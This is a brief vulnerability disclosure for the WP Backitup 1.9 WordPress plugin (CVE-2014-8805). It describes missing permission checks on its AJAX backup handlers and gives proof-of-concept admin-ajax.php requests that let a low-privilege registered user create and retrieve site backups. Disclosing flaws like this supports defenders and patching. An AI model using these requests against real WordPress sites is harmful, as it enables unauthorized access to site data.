WP Backitup 1.9 Privilege Escalation

Homepage:

https://wordpress.org/plugins/wp-backitup

CVE-ID

CVE-2014-8805

CVSS Score

4

CVSS Vector

(AV:N/AC:L/Au:S/C:P/I:N/A:N)

Description:

Regular user (created using wp-login.php?action=register) can run backup functionality:

File: wp-backitup\lib\includes\class-wpbackitup-admin.php

add_action('wp_ajax_wp-backitup_backup', array( &$this, 'ajax_backup' ));
add_action('wp_ajax_wp-backitup_backup_status_reader', array( &$this,'ajax_get_backup_status'));

Proof of Concept:

Login as regular user then queue backup.

http://wordpress-instalation/wp-admin/admin-ajax.php?action=wp-backitup_backup

After that you can start scheduled backup (you must use this link few times because backup has few steps):

http://wordpress-instalation/wp-admin/admin-ajax.php?action=wp-backitup_backup_status_reader

You can download backup using Disclosure of Potentially Sensitive Information

Timeline: